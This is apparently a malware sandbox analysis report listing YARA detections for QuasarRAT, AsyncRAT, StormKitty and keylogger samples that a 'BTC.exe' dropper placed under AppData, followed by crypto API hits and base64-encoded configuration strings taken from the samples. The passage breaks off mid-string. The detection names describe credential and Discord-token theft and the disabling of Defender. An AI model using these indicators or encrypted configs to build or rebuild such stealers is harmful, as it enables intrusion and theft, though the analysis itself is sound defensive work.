                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Quasarrat_e52df647 (reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23)
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 (date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 (date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740)
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 (date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10)
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: Vermin_Keylogger_Jan18_1 (date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 (date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: CN_disclosed_20180208_KeyLogger_1 (date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1 (date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender (author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender)
                            Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_QuasarRAT (author = ditekSHen, description = QuasarRAT payload)
                            Source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY; Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
                            Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
                            Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                            Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                            Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
                            Source: BTC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: BTC.exe, Program.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Windows Defender Service Host.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Windows Defender Service Host.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Windows Defender Service Host.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Cracked.exe.0.dr, Settings.csBase64 encoded string: 'Qn8SqsI3jUQBAUjqjalm3oJMLd/PbscIFd6rNbQ5sRZNn4xQ1j9+smFfWlHEI1gikBTJ0XwXBbd7vrP4j7UNlA==', 'WwGUu43hHVOQw4bhNIONAbpY8cH0OewHJ6IJs1kKJ+cu/7wi9YsKufGrVcAtJreaghEgt3mKwnnP4jUNLVCerlv/S0eftqeHDCa8kAVIzT4=', 'wxTsCpYNu1AiEBtW0/wF2Xsle2ZY6OiGu6IE3jMxekVMgibQsLE47ouxwB/hD5QIHh1HjkaDjgCTz5TgDgJNhfsNtnq3Hb5jHb1NqETf8pbbLS5GP3lA9At6RUJ33ZCh', 'ywn+OxV3qgXWKyUE+iTmL0mFT3aNwmXqH/A241apHqZR5xfPAY4d1oDzbkJMbCrW0mumEKlXNebqerwRdgmFPQ==', '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', 'Q/UCu6O47CHFGS6KCBvM4o1+Usq+s6Ccg2UKnm/GJqCVWrBQ3L9hKjojrlgaefg1NwBAJ8ORnVT5JMNcdmWzFw==', 'j/7gTotOxXp2+vfq93u+6A2lmLCVvVGgv+oHm8X+q2MPS5v1jKAaieoUVjlLC4fPtYq6cVnDufXuNZZwXbzmLg==', '/h1sm9P1a0vsAHGS8FWEGBd85oCTGrU9bR3qkhrL/yHSsHXp+/O5kqUUccsMCZ4KW+AmDJ3iXa56+31XiEJM+Q=='
                            Source: svchost.exe.0.dr, Settings.csBase64 encoded string: 'jwh9YEcQLbzEbVa/2R1pWRdI201qZIF00f5L/dc0HXbKPxlOhuBUMhRLUgWjoCfB5UjPt5uxqTk8iXXy4mbCRQ==', 'oPn/yHRL1hVo30GpnOMutMW4CrbA3t9P2mHmjsbGbbaZ5w94AmjDvkUbLWdA3z4+imSKTzN9g1Ks64rNFkFgzQ==', 'PnlZm/1SaIt4QDVCIktKtu0qNuYWCqSCa3XofEb+JaQKW7sLU38vm+3QUmNuqdASw1uQizgxMKt9TLp1wPaE/A==', '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', '+oRhpNk40BIYUso0yM9SsqCONZIT3q6uE901FU6YjhIPto/YrwwnSELwwwbzc92oBGg6/0lEcgCUvULlBWphoQ==', 'RsQ48BXG2GJ5jNp3LNdZZf3zsbJ8PZXBh5ov71kZO0KLH1u3d1d0lGUR0mLQ5b6cgu0PucK9nU28ncymifecFA==', 'NApmi7FKsAmZvApijRQXm+xndS0RivsZ0R8+UarZQ6vGYArEs7FUjuCnPLJ7RnLdqulMTPcGwwhl2FwOjwJ12w=='
                            Source: update.exe.0.dr, .csBase64 encoded string: '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', 'HZ8cUSwMOJ6qgU9qML8pT52ujZ1nO8sF7yY
